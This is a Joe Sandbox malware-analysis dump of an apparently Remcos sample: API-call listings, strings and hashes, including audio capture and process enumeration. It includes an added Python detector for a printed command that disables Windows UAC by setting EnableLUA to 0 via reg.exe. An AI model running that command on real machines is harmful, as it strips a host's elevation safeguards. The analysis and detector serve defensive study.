                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                                                          • String ID: 0$MsgWindowClass
                                                                                          • API String ID: 2877667751-2410386613
                                                                                          • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                          • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                          • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                          • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                          • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                          • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                          Strings
                                                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                          • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$CreateProcess
                                                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                          • API String ID: 2922976086-4183131282
                                                                                          • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                          • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                          • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                          • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
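The CreateProcessA call above is the UAC-disable step: the sample launches cmd.exe /k with reg.exe ADD on HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, setting EnableLUA to 0, which switches UAC off for every later elevation on the host. Because reg.exe is wrapped in cmd.exe /k and the path is written with %windir%, a detection that only keys on Image == reg.exe or on the literal path will miss the cmd.exe event. The following detector is an added example, not code from the report, Joe Sandbox or Remcos: it normalises process-creation command lines and flags any reg add that writes 0 to a UAC policy value under that key. The sample events are constructed in the shape of Sysmon Event ID 1 fields; record 0 mirrors the CreateProcessA arguments in the listing, and the extra value names ConsentPromptBehaviorAdmin and PromptOnSecureDesktop are an assumption added beyond what the report shows.

```python
import re
import sys

# Registry key (under HKLM) that holds the UAC policy values; the sample writes to it via reg.exe.
POLICY_KEY = r"software\microsoft\windows\currentversion\policies\system"
# Values under that key where data 0 weakens or disables UAC. EnableLUA=0 (what the sample
# writes) turns UAC off entirely; the other two are assumed neighbours worth watching.
UAC_VALUES = {"enablelua", "consentpromptbehavioradmin", "promptonsecuredesktop"}

# Constructed process-creation records shaped like Sysmon Event ID 1 fields (not from the report).
# Record 0 mirrors the CreateProcessA arguments in the listing; the rest are benign look-alikes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 1 /f'},
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA"},
]


def normalize(cmd):
    """Lower-case, strip quotes, expand %windir%/%SystemRoot% and spell HKLM consistently."""
    n = cmd.strip().lower().replace('"', "")
    n = re.sub(r"%(windir|systemroot)%", lambda _: r"c:\windows", n)
    n = re.sub(r"\bhkey_local_machine\b", "hklm", n)
    return n


def parse_reg_add(cmd):
    """Return (key, value_name, data) for a 'reg add' anywhere in cmd, or None.

    The sample wraps reg.exe in 'cmd.exe /k ...', so the match is not anchored at the start.
    """
    n = normalize(cmd)
    m = re.search(r"(?:^|[\s\\/])reg(?:\.exe)?\s+add\s+(\S+)(.*)$", n)
    if not m:
        return None
    key, rest = m.group(1), m.group(2)
    opts = dict(re.findall(r"/(v|t|d)\s+(\S+)", rest))
    return key, opts.get("v"), opts.get("d")


def is_uac_disable(cmd):
    """True when cmd sets a UAC policy value under HKLM ...\\Policies\\System to 0."""
    parsed = parse_reg_add(cmd)
    if parsed is None:
        return False
    key, name, data = parsed
    if not (key.startswith("hklm\\") and key.endswith(POLICY_KEY)):
        return False
    return name in UAC_VALUES and data in ("0", "0x0")


def scan(events):
    """Return the events whose command line disables UAC; ParentImage points at the culprit."""
    return [e for e in events if is_uac_disable(e.get("CommandLine", ""))]


def current_enablelua():
    """Read HKLM EnableLUA on the live host (Windows only); None elsewhere. 0 means UAC is off."""
    if sys.platform != "win32":
        return None
    import winreg  # standard library on Windows
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System") as k:
        return winreg.QueryValueEx(k, "EnableLUA")[0]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print("UAC disabled by", hit["ParentImage"], "->", hit["CommandLine"])
    print("live EnableLUA:", current_enablelua())
```

Both the cmd.exe event and the child reg.exe event match, so the parent chain (6Ctc0o7vhqKgjU7.exe -> cmd.exe -> reg.exe) is recoverable from either. Pair the command-line rule with a Sysmon Event ID 13 (registry value set) alert on EnableLUA under the same key, which also catches the change when it is made without reg.exe; a write of 0 there takes effect for new elevations immediately, so the value should be checked and restored to 1 during remediation.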
                                                                                          Strings
                                                                                          • C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe, xrefs: 004076FF
                                                                                          • Rmc-35QZU7, xrefs: 00407715
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe$Rmc-35QZU7
                                                                                          • API String ID: 0-923180022
                                                                                          • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                          • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                          • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                          • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                          • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                          • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                          • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                          APIs
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                          • String ID: KeepAlive | Disabled
                                                                                          • API String ID: 2993684571-305739064
                                                                                          • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                          • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                          • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                          • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                          APIs
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                          • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                          • String ID: Alarm triggered
                                                                                          • API String ID: 614609389-2816303416
                                                                                          • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                          • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                          • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                          • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                                                          Strings
                                                                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                          • API String ID: 3024135584-2418719853
                                                                                          • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                          • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                          • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                          • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                          • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                          • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                          • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                          APIs
                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                            • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                            • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 2180151492-0
                                                                                          • Opcode ID: 8bc58311dc18a25ad1b21727c0348b30609c5b28e660f967249513ebcc30a9ec
                                                                                          • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                          • Opcode Fuzzy Hash: 8bc58311dc18a25ad1b21727c0348b30609c5b28e660f967249513ebcc30a9ec
                                                                                          • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID:
                                                                                          • API String ID: 269201875-0
                                                                                          • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                          • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                          • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                          • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                          • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                          • __freea.LIBCMT ref: 0045129D
                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                          • String ID:
                                                                                          • API String ID: 313313983-0
                                                                                          • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                          • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                          • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                          • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                          APIs
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                          • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                          • waveInStart.WINMM ref: 00401CFE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                          • String ID:
                                                                                          • API String ID: 1356121797-0
                                                                                          • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                          • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                                          • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                          • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                          • _free.LIBCMT ref: 0044F43F
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                          • String ID:
                                                                                          • API String ID: 336800556-0
                                                                                          • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                          • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                          • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                          • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                          • _free.LIBCMT ref: 00448353
                                                                                          • _free.LIBCMT ref: 0044837A
                                                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free
                                                                                          • String ID:
                                                                                          • API String ID: 3170660625-0
                                                                                          • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                          • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                          • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                          • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                          APIs
                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                          • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseHandleOpen$FileImageName
                                                                                          • String ID:
                                                                                          • API String ID: 2951400881-0
                                                                                          • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                          • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                                          • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                          • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 00450A54
                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                          • _free.LIBCMT ref: 00450A66
                                                                                          • _free.LIBCMT ref: 00450A78
                                                                                          • _free.LIBCMT ref: 00450A8A
                                                                                          • _free.LIBCMT ref: 00450A9C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                          • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
